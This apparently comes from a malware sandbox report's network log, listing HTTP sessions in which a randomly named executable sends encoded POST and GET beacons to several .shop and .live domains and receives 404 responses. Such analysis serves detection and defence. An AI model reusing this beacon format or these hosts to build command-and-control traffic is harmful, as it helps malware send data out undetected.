                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 45 51 33 4b 4e 35 4a 32 69 34 53 6d 48 79 48 6c 42 36 5a 54 4c 4d 62 6c 6f 36 59 49 4b 56 51 31 46 71 4f 4a 64 6c 34 57 67 53 56 75 7a 37 33 58 4e 77 43 69 73 62 42 62 64 6f 76 30 4a 66 6f 78 50 34 62 64 4d 67 68 4b 41 67 34 72 6b 52 41 66 4a 67 2b 79 37 38 2f 4d 45 42 53 2f 63 62 62 48 4b 52 55 70 30 63 52 78 4c 6e 6e 65 47 71 34 68 7a 79 37 4f 56 38 34 68 65 2b 73 34 68 73 34 4c 45 67 72 54 4b 56 49 39 6d 43 38 4a 36 65 54 56 7a 73 55 30 6f 76 79 50 4c 74 39 37 55 68 63 6e 49 47 46 71 39 72 78 54 4f 38 72 66 38 34 65 65 48 53 55 4c 65 66 44 42 47 51 58 47 64 48 5a 4a 6c 6b 54 46 70 35 69 37 5a 2f 6e 6f 6c 6c 30 32 55 71 34 62 78 67 59 50 72 6d 61 4a 68 6d 6a 41 6a 4f 31 2f 57 66 67 39 6a 6f 58 77 73 4f 5a 6b 6c 6e 38 77 56 6a 77 62 64 31 59 58 72 42 35 33 79 37 70 35 36 6a 57 53 66 2b 49 33 61 70 65 66 50 79 70 43 6a 4b 32 32 69 45 64 70 6f 57 5a 45 42 31 64 51 52 36 31 72 48 54 32 69 4f 52 4a 41 35 64 77 37 58 55 56 7a 65 6d 47 69 71 2f 64 52 73 62 79 2b 34 69 55 37 6a [TRUNCATED]
                                                                    Data Ascii: dpy4vDKP=EQ3KN5J2i4SmHyHlB6ZTLMblo6YIKVQ1FqOJdl4WgSVuz73XNwCisbBbdov0JfoxP4bdMghKAg4rkRAfJg+y78/MEBS/cbbHKRUp0cRxLnneGq4hzy7OV84he+s4hs4LEgrTKVI9mC8J6eTVzsU0ovyPLt97UhcnIGFq9rxTO8rf84eeHSULefDBGQXGdHZJlkTFp5i7Z/noll02Uq4bxgYPrmaJhmjAjO1/Wfg9joXwsOZkln8wVjwbd1YXrB53y7p56jWSf+I3apefPypCjK22iEdpoWZEB1dQR61rHT2iORJA5dw7XUVzemGiq/dRsby+4iU7jgrz5ezAu3OTwLRpCcMBNR1OCofJh9j7FymMp7OHQBWgP/NGNp86IZMf3Of1Z5RfGh8NMqgmjkiIumUxcpCAq1dhf6IiIMFROHRfHs2wqmu0/PceHwPAd9vC8mwUHy0ESMcGAOrabjA9bfzGxMS/iivPQcr7b0tNIR9RElFihhDs7na5eY2hP5Bv6lSD62YBE8cJ0VQDleeGXY4lyf0o6vFcLoWXCJoVK0JlvbWhe1/S/qPANQs5zC0GAEaw5JaCZhCeCyaU5UTUEeIYnazGaZBKrqiUZGyw6nAttz8qNEuvwBkvNpjyf6HHAtf9HMtWBb5q2WTZXsILgFTpyR7Vu6mjHYVEN3HXcVU69r599fxeIgb8khYRf8XEDTSeQtg9FLFWWKbQej9Ll2Z6IPBpehEi9FVUSYBFrogsv/tIIADIK7m1UvVwJhM29L9tE0FuvbWfAxtG73Fjhz6FB16TDxFcuPEUfT+JnUIzwEHya9K9dgB0JFLw/XapAIMoIyFvwAjOGVQS8Gz9zegzVsG28UEpuPPf56u4q2MNfGO+OiiL3XxPpl4JA+KYgt50Qv32uZjIjxLSN9530TV9qJc/3uhRH9np/IagBO6/o0e3IKm89njry5ObKiWT6IXAdWI1820JLSd/5/rupa05c4nodLVVFpA5sqn8hdm [TRUNCATED]
                                                                    Dec 5, 2024 09:44:21.019366980 CET367INHTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 08:44:20 GMT
                                                                    Server: Apache
                                                                    Content-Length: 203
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6f 39 6b 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /io9k/ was not found on this server.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.849721195.110.124.133805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:44:22.282315969 CET526OUTGET /io9k/?dpy4vDKP=JSfqOM1hntmKPRX8QapMCMaojpQJWGU7F5uIf0M4pwAd1rq+GgCVpaF7coK3O/ojAayWDC1AXCc++TdMJ3it9pzzLzylaJ3SA3sw8PdpX1afK4k48hvBTosEFJxP8txHbg==&t8=erepa0aHg HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.officinadelpasso.shop
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Dec 5, 2024 09:44:23.579639912 CET367INHTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 08:44:23 GMT
                                                                    Server: Apache
                                                                    Content-Length: 203
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6f 39 6b 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /io9k/ was not found on this server.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.849722209.74.77.107805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:44:29.149302959 CET780OUTPOST /2bf0/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.liveplah.live
                                                                    Origin: http://www.liveplah.live
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.liveplah.live/2bf0/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 36 4d 43 43 64 36 6d 52 4e 54 58 62 73 4b 78 55 76 42 5a 52 79 48 30 56 70 57 43 6d 50 6f 32 71 38 76 72 4d 62 34 54 58 48 72 59 33 49 76 6c 44 74 4a 53 74 53 77 53 69 32 53 43 6e 36 49 36 48 36 4e 77 6c 58 65 6d 4e 5a 49 49 76 5a 63 68 79 37 30 4a 39 65 43 53 61 53 4d 7a 50 62 37 4b 69 61 45 77 4a 71 38 4c 67 76 42 73 47 6e 36 62 76 55 57 2f 51 62 74 53 42 32 48 7a 35 4f 59 46 34 44 46 52 6e 2f 57 58 53 68 46 2f 45 59 47 32 4b 6b 62 7a 6e 71 75 32 56 56 33 73 4c 37 48 6b 2b 78 4e 70 68 61 76 31 2b 53 36 73 32 38 49 2f 67 54 6c 54 55 59 77 57 64 67 42 68 72 66 5a 35 63 43 36 46 6a 54 55 63 3d
                                                                    Data Ascii: dpy4vDKP=6MCCd6mRNTXbsKxUvBZRyH0VpWCmPo2q8vrMb4TXHrY3IvlDtJStSwSi2SCn6I6H6NwlXemNZIIvZchy70J9eCSaSMzPb7KiaEwJq8LgvBsGn6bvUW/QbtSB2Hz5OYF4DFRn/WXShF/EYG2Kkbznqu2VV3sL7Hk+xNphav1+S6s28I/gTlTUYwWdgBhrfZ5cC6FjTUc=
                                                                    Dec 5, 2024 09:44:30.374099970 CET533INHTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 08:44:30 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    14192.168.2.849723209.74.77.107805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:44:31.821647882 CET800OUTPOST /2bf0/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.liveplah.live
                                                                    Origin: http://www.liveplah.live
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.liveplah.live/2bf0/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 36 4d 43 43 64 36 6d 52 4e 54 58 62 71 71 68 55 71 69 42 52 6d 58 31 6e 31 47 43 6d 57 34 32 32 38 76 6e 4d 62 35 58 48 48 59 73 33 49 50 56 44 2f 34 53 74 63 51 53 69 35 79 43 69 2b 49 36 32 36 4d 4e 59 58 65 71 4e 5a 49 4d 76 5a 63 78 79 37 44 64 2b 66 53 53 59 4b 38 7a 4e 57 62 4b 69 61 45 77 4a 71 39 76 61 76 42 6b 47 67 4b 4c 76 58 33 2f 54 45 64 53 43 31 48 7a 35 66 49 46 47 44 46 52 52 2f 58 4c 34 68 48 33 45 59 45 75 4b 6a 4f 48 6b 68 75 32 54 52 33 74 70 34 48 45 36 77 50 70 42 66 63 42 70 4c 4d 34 70 39 2b 4f 4b 4a 48 62 53 62 77 2b 32 67 43 4a 64 61 75 6b 30 59 5a 56 54 4e 44 4a 58 42 49 77 52 72 75 6c 52 49 77 59 37 49 6d 66 35 61 32 42 64
                                                                    Data Ascii: dpy4vDKP=6MCCd6mRNTXbqqhUqiBRmX1n1GCmW4228vnMb5XHHYs3IPVD/4StcQSi5yCi+I626MNYXeqNZIMvZcxy7Dd+fSSYK8zNWbKiaEwJq9vavBkGgKLvX3/TEdSC1Hz5fIFGDFRR/XL4hH3EYEuKjOHkhu2TR3tp4HE6wPpBfcBpLM4p9+OKJHbSbw+2gCJdauk0YZVTNDJXBIwRrulRIwY7Imf5a2Bd
                                                                    Dec 5, 2024 09:44:33.044850111 CET533INHTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 08:44:32 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.849724209.74.77.107805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:44:34.491868019 CET1817OUTPOST /2bf0/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.liveplah.live
                                                                    Origin: http://www.liveplah.live
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.liveplah.live/2bf0/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 36 4d 43 43 64 36 6d 52 4e 54 58 62 71 71 68 55 71 69 42 52 6d 58 31 6e 31 47 43 6d 57 34 32 32 38 76 6e 4d 62 35 58 48 48 59 30 33 50 38 74 44 75 71 36 74 66 51 53 69 77 53 43 6a 2b 49 36 52 36 4d 56 55 58 65 58 36 5a 4b 45 76 59 2f 4a 79 33 69 64 2b 57 53 53 59 44 63 7a 4f 62 37 4b 33 61 46 41 56 71 39 2f 61 76 42 6b 47 67 49 6a 76 44 32 2f 54 43 64 53 42 32 48 7a 31 4f 59 45 72 44 46 5a 76 2f 58 66 43 69 33 58 45 64 55 2b 4b 69 34 62 6b 69 4f 32 52 57 33 74 50 34 48 4a 6b 77 50 31 6a 66 63 46 50 4c 4c 55 70 2f 34 7a 48 5a 6e 72 70 4e 54 53 68 70 79 42 33 56 73 6b 67 65 5a 46 7a 45 30 35 30 4c 2f 35 2f 70 73 56 78 42 43 41 79 66 69 7a 49 65 68 6b 4b 35 49 55 43 42 32 6b 67 43 61 53 35 37 6a 4e 55 5a 71 54 4b 47 2f 55 4a 34 59 53 49 52 45 66 45 4a 67 63 42 4c 6d 41 52 70 4e 64 48 35 72 63 75 37 66 43 37 66 58 71 39 53 61 31 53 75 4c 65 4c 62 51 53 50 36 6f 6b 39 66 54 5a 38 78 70 48 44 62 76 66 77 57 30 55 64 68 33 47 65 4e 63 4a 57 4c 6a 54 42 72 4a 6e 69 51 7a 49 79 72 [TRUNCATED]
                                                                    Data Ascii: dpy4vDKP=6MCCd6mRNTXbqqhUqiBRmX1n1GCmW4228vnMb5XHHY03P8tDuq6tfQSiwSCj+I6R6MVUXeX6ZKEvY/Jy3id+WSSYDczOb7K3aFAVq9/avBkGgIjvD2/TCdSB2Hz1OYErDFZv/XfCi3XEdU+Ki4bkiO2RW3tP4HJkwP1jfcFPLLUp/4zHZnrpNTShpyB3VskgeZFzE050L/5/psVxBCAyfizIehkK5IUCB2kgCaS57jNUZqTKG/UJ4YSIREfEJgcBLmARpNdH5rcu7fC7fXq9Sa1SuLeLbQSP6ok9fTZ8xpHDbvfwW0Udh3GeNcJWLjTBrJniQzIyry8Y+9BT6jr2trNy0W58le8baHMmZXvZlMqySieUVgvr6GcM7+Eab4b5NSj8gRGobjPCeNUq1D13SQFvmgdplJXqdPxvDNqdKdM2eKeaXpt4uqc3piGeKb1ZBpe+ptnoAngVOca77mdEnPiWMlu2eXxpDhyXxnGi7tbShyRqVZYn9oKuK43lMial+wcFx2tqoDnC/kjgTiFPV1/vZ14nJ9KqAdg32voI1fi9jDjR58C16IPVe6ULISj2OpGhl9iH/S/y9/A9Ynux0ZikIcwGWJvRvHMlbUOAuivnJSY2VJrT6IT+hdr6Yd7O8b0d7asPOncFPcefCZthZUovrhGrFGTUUPxaGPLWyr2gX7bxCWRunwbIN2zbiJprS4vwKe2uk48obON1I1eR2tuQdggcMo1lzXCEC+7EzLV4e0onmTTd0rRqpSfqCturpN1b5i4WZmh2d0Hu2cZdbEVwxxOedce1W2GRkuCGe1twuVtQv9uVzJOnz46KvHT7t7Y8oUSwsAvoZxZpFzfSEnKxOllqICqf2AT1M9lnssxxNDmD9qJMsXx59HGx68u31bDF21oDhFimTBnMSf0wESQsGgDk+OMCNnwXKP9YPxIgZjEphEr1paasQAPzp+QlMFv7UQyrMiUebLRb+Q5XItU17c3kVzZqJhZCqwx/1eo [TRUNCATED]
                                                                    Dec 5, 2024 09:44:35.795859098 CET533INHTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 08:44:35 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.2.849725209.74.77.107805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:44:37.166523933 CET518OUTGET /2bf0/?t8=erepa0aHg&dpy4vDKP=3OqiePSgEWDnichCzykulC99ilyMR42c9dvyS4flA69FHugFqZCdTRqO1AzR0oWb7uhSQNyMOpAGAvI21ypqYHnlFtq0XISmUzcVnvfhkgBzm7iBPlHVCbyp9E6MDtQhfw== HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.liveplah.live
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Dec 5, 2024 09:44:38.396351099 CET548INHTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 08:44:38 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.2.84972684.32.84.32805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:44:44.084762096 CET786OUTPOST /qize/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.appsolucao.shop
                                                                    Origin: http://www.appsolucao.shop
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.appsolucao.shop/qize/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 41 54 46 67 78 4a 75 6a 65 54 61 37 75 6b 55 34 66 43 34 59 4d 38 34 6b 48 67 4b 70 48 64 36 59 58 42 76 50 41 7a 39 70 79 6f 57 2b 43 58 62 53 4c 65 53 38 38 6a 6c 6d 71 53 4f 49 41 30 7a 59 64 49 6b 50 68 6d 41 4e 79 52 4b 44 56 57 54 46 48 2b 68 42 65 65 59 41 41 39 65 76 41 62 72 53 51 4f 4f 65 77 4e 31 41 76 59 78 71 79 4c 6d 64 58 34 52 53 49 38 41 79 4e 68 47 5a 4b 65 6c 4c 6c 77 58 69 58 79 31 6f 46 52 72 5a 64 2f 41 38 43 73 57 42 4d 33 75 5a 63 42 79 51 67 35 6d 7a 32 78 51 53 41 55 36 48 73 4c 53 43 70 5a 65 4c 6a 39 6b 44 79 74 4f 4b 79 33 54 75 41 33 44 74 71 49 35 39 35 4e 63 3d
